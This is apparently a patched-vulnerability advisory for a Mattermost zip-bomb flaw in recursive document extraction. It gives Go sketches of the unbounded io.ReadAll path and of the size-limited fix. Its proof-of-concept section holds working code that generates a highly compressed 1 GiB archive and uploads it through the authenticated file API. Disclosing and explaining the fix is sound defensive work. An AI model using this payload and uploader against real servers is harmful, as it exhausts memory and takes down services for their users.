Status: Patched
This vulnerability has been verified as resolved and deployed.
Zip bomb memory exhaustion in recursive document extraction (CVE-2026-3114)
Summary
Upload checks limited compressed archive size, but extraction did not limit decompressed entry size
Mattermost enforces FileSettings.MaxFileSize on uploaded files, but the document extraction service previously did not apply that same limit to each decompressed archive entry. When file-content extraction and archive recursion were enabled, archiveExtractor.Extract mounted an uploaded archive, walked entries with fs.WalkDir, opened each entry, and called io.ReadAll(file) before handing the decompressed bytes to sub-extractors. A small compressed archive could therefore expand into very large in-memory entry data and exhaust server memory during content extraction.
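In outline, the pre-patch behavior looks like the sketch below. It is a self-contained illustration that uses archive/zip as a stand-in for the mounted archive filesystem; the upload.zip name and the extractAllUnbounded helper are hypothetical, not the actual archiveExtractor code.

```go
// Sketch of the vulnerable pattern: every archive entry is decompressed fully
// into memory with io.ReadAll, with no per-entry size limit.
package main

import (
	"archive/zip"
	"fmt"
	"io"
	"io/fs"
	"log"
)

func extractAllUnbounded(zr *zip.Reader) error {
	return fs.WalkDir(zr, ".", func(path string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() {
			return err
		}
		f, openErr := zr.Open(path)
		if openErr != nil {
			return openErr
		}
		defer f.Close()

		// Unbounded read: a tiny compressed entry can expand to gigabytes here,
		// which is the memory-exhaustion primitive described above.
		data, readErr := io.ReadAll(f)
		if readErr != nil {
			return readErr
		}
		fmt.Printf("%s: %d decompressed bytes held in memory\n", path, len(data))
		return nil
	})
}

func main() {
	zr, err := zip.OpenReader("upload.zip") // hypothetical sample archive
	if err != nil {
		log.Fatal(err)
	}
	defer zr.Close()
	if err := extractAllUnbounded(&zr.Reader); err != nil {
		log.Fatal(err)
	}
}
```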
The fix threads MaxFileSize through docextractor.ExtractSettings and the Extractor interface, passes the configured file-size limit from App.ExtractContentFromFileInfo, and wraps archive entry readers with utils.NewLimitedReaderWithError before io.ReadAll. The original fix is PR #35200 / commit b947f1c38a675688c5fc9ade696d0f0f2bad430a; backports include #35220, #35279, and #35282.
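The helper itself is not reproduced here; the essential property of such a wrapper is that it returns a distinct error, rather than a silent io.EOF, once a byte budget is exceeded. A minimal sketch of that pattern follows, with the package name limitreader and the ErrSizeLimitExceeded value as assumed names, not Mattermost's actual utils.NewLimitedReaderWithError implementation.

```go
// Sketch of an error-returning limited reader: reads succeed up to the limit,
// and anything beyond it surfaces as an error instead of a truncated result.
package limitreader

import (
	"errors"
	"io"
)

// ErrSizeLimitExceeded is returned once the wrapped reader produces more
// than the configured number of bytes.
var ErrSizeLimitExceeded = errors.New("size limit exceeded")

type limitedReader struct {
	lr *io.LimitedReader
}

// NewLimitedReaderWithError wraps r so that callers such as io.ReadAll fail
// with ErrSizeLimitExceeded instead of silently stopping at the limit.
func NewLimitedReaderWithError(r io.Reader, limit int64) io.Reader {
	// Allow one extra byte so "exactly at the limit" can be told apart
	// from "larger than the limit".
	return &limitedReader{lr: &io.LimitedReader{R: r, N: limit + 1}}
}

func (l *limitedReader) Read(p []byte) (int, error) {
	n, err := l.lr.Read(p)
	if err == io.EOF && l.lr.N <= 0 {
		// The cap was hit before the underlying data ended: over the limit.
		return n, ErrSizeLimitExceeded
	}
	return n, err
}
```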
CVSS Score
Vulnerability Location
Source-to-Sink Analysis
When file-content extraction is enabled, an upload's file metadata can trigger ExtractContentFromFileInfo immediately after storage; the extract-content job can also process stored files later.
The patched app layer now passes both ArchiveRecursion and the configured MaxFileSize into the document extractor.
When archive recursion is enabled, the archive extractor is configured with a sub-extractor chain and receives the MaxFileSize value through the shared extractor interface.
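The plumbing is easiest to picture as a small sketch. The shapes below are illustrative assumptions based on the description above (a settings struct carrying both values, and a shared extractor interface through which the limit reaches the sub-extractor chain); they are not the actual docextractor definitions.

```go
// Illustrative shapes of the post-fix plumbing: the app layer fills one
// settings struct from FileSettings, and the size limit rides along the same
// interface used by the archive extractor's sub-extractor chain.
package docsketch

import "io"

// ExtractSettings mirrors what the app layer passes in: whether to recurse
// into archives, and the maximum size a single decompressed entry may reach.
type ExtractSettings struct {
	ArchiveRecursion bool
	MaxFileSize      int64
}

// Extractor is a stand-in for the shared extractor interface after the fix,
// with the configured limit threaded through to every implementation.
type Extractor interface {
	Match(filename string) bool
	Extract(filename string, r io.ReadSeeker, maxFileSize int64) (string, error)
}

// archiveExtractor holds the sub-extractor chain used for entries found inside
// an archive when ArchiveRecursion is enabled; it forwards maxFileSize to it.
type archiveExtractor struct {
	SubExtractor Extractor
}
```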
Before the fix, each archive entry was read with an unbounded io.ReadAll(file). The patched code wraps the entry in a limited reader before reading decompressed bytes into memory.
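The real fix wraps the entry reader with utils.NewLimitedReaderWithError; the standalone approximation below achieves the same bounded behavior with only the standard library, and the extractEntryBounded name is an assumption for illustration.

```go
// Sketch of the patched read path: the decompressed entry stream is capped
// before io.ReadAll, so an oversized entry yields an error instead of an
// arbitrarily large allocation.
package docsketch

import (
	"errors"
	"io"
	"io/fs"
)

var errEntryTooLarge = errors.New("decompressed entry exceeds the configured max file size")

func extractEntryBounded(fsys fs.FS, path string, maxFileSize int64) ([]byte, error) {
	f, err := fsys.Open(path)
	if err != nil {
		return nil, err
	}
	defer f.Close()

	// Read at most maxFileSize+1 bytes; seeing the extra byte means the
	// decompressed entry is over the limit, so memory use stays bounded.
	data, err := io.ReadAll(io.LimitReader(f, maxFileSize+1))
	if err != nil {
		return nil, err
	}
	if int64(len(data)) > maxFileSize {
		return nil, errEntryTooLarge
	}
	return data, nil
}
```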
Impact Analysis
Critical Impact
A small authenticated upload can cause disproportionate server memory allocation during content extraction. Repeated uploads or a sufficiently large decompressed entry can exhaust memory, destabilize extraction workers, and degrade or crash the Mattermost process.
Attack Surface
Mattermost servers with file uploads enabled and file-content extraction configured. The decompressed-entry risk specifically depends on recursive archive extraction (FileSettings.ArchiveRecursion) because sub-extraction reads archive entries into memory.
Preconditions
The attacker needs an account or integration capable of uploading files to a channel where the server will process the file for text extraction. The compressed archive must fit within the configured upload size limit while expanding to very large entry data.
Proof of Concept
Environment Setup
Use a vulnerable build from before PR #35200 with FileSettings.ExtractContent and FileSettings.ArchiveRecursion both enabled. Keep FileSettings.MaxFileSize at a normal value such as 100 MB.
Target Configuration
The vulnerable path is the document extraction service, not the upload size check. The archive itself must be accepted by upload limits while containing an entry that decompresses to a much larger size.
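For a concrete sense of the size asymmetry, a single ZIP entry of repeated bytes compresses extremely well under DEFLATE. The sketch below writes one such entry; the 1 GiB figure and the bomb.zip and notes.txt names are arbitrary illustration values, and the point is only that the archive on disk stays far below a typical MaxFileSize while the entry's decompressed size does not.

```go
// Sketch of a crafted archive: one text entry whose decompressed size is ~1 GiB
// but whose compressed size is on the order of a megabyte, because DEFLATE
// compresses a repeated byte run very efficiently.
package main

import (
	"archive/zip"
	"log"
	"os"
)

func main() {
	out, err := os.Create("bomb.zip") // hypothetical output name
	if err != nil {
		log.Fatal(err)
	}
	defer out.Close()

	zw := zip.NewWriter(out)
	entry, err := zw.Create("notes.txt")
	if err != nil {
		log.Fatal(err)
	}

	// Write 1 GiB of identical bytes in 1 MiB chunks to keep this program's
	// own memory use small; the decompressed entry is still 1 GiB.
	chunk := make([]byte, 1<<20)
	for i := range chunk {
		chunk[i] = 'A'
	}
	for written := 0; written < 1<<30; written += len(chunk) {
		if _, err := entry.Write(chunk); err != nil {
			log.Fatal(err)
		}
	}

	if err := zw.Close(); err != nil {
		log.Fatal(err)
	}
}
```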
Exploit Delivery
Upload a crafted ZIP archive with a highly compressed large text entry. The server stores the uploaded file and invokes extraction either immediately or through the extract-content job.
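Delivery can be an ordinary authenticated upload through the public API. The sketch below posts the archive as multipart form data to POST /api/v4/files; the server URL, token, and channel ID are placeholders, and the files and channel_id field names follow the public Mattermost v4 API as documented, so verify them against the target version.

```go
// Sketch of delivering the archive through a normal authenticated file upload.
package main

import (
	"bytes"
	"fmt"
	"io"
	"log"
	"mime/multipart"
	"net/http"
	"os"
)

func main() {
	const (
		serverURL = "https://mattermost.example.com" // placeholder
		token     = "REPLACE_WITH_SESSION_TOKEN"     // placeholder
		channelID = "REPLACE_WITH_CHANNEL_ID"        // placeholder
	)

	archive, err := os.Open("bomb.zip")
	if err != nil {
		log.Fatal(err)
	}
	defer archive.Close()

	// Build the multipart body: channel_id field plus the archive itself.
	var body bytes.Buffer
	mw := multipart.NewWriter(&body)
	if err := mw.WriteField("channel_id", channelID); err != nil {
		log.Fatal(err)
	}
	part, err := mw.CreateFormFile("files", "bomb.zip")
	if err != nil {
		log.Fatal(err)
	}
	if _, err := io.Copy(part, archive); err != nil {
		log.Fatal(err)
	}
	if err := mw.Close(); err != nil {
		log.Fatal(err)
	}

	req, err := http.NewRequest(http.MethodPost, serverURL+"/api/v4/files", &body)
	if err != nil {
		log.Fatal(err)
	}
	req.Header.Set("Authorization", "Bearer "+token)
	req.Header.Set("Content-Type", mw.FormDataContentType())

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()
	fmt.Println("upload status:", resp.Status)
}
```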
Outcome
On a vulnerable build, extraction memory grows with the decompressed entry size. The patch turns this decompressed-entry overrun into a bounded extraction error instead of unbounded memory growth.
Expected Response
On vulnerable builds, extraction attempts to allocate the full decompressed entry via io.ReadAll(file). On fixed builds, reading the entry fails once the configured max file size is exceeded.
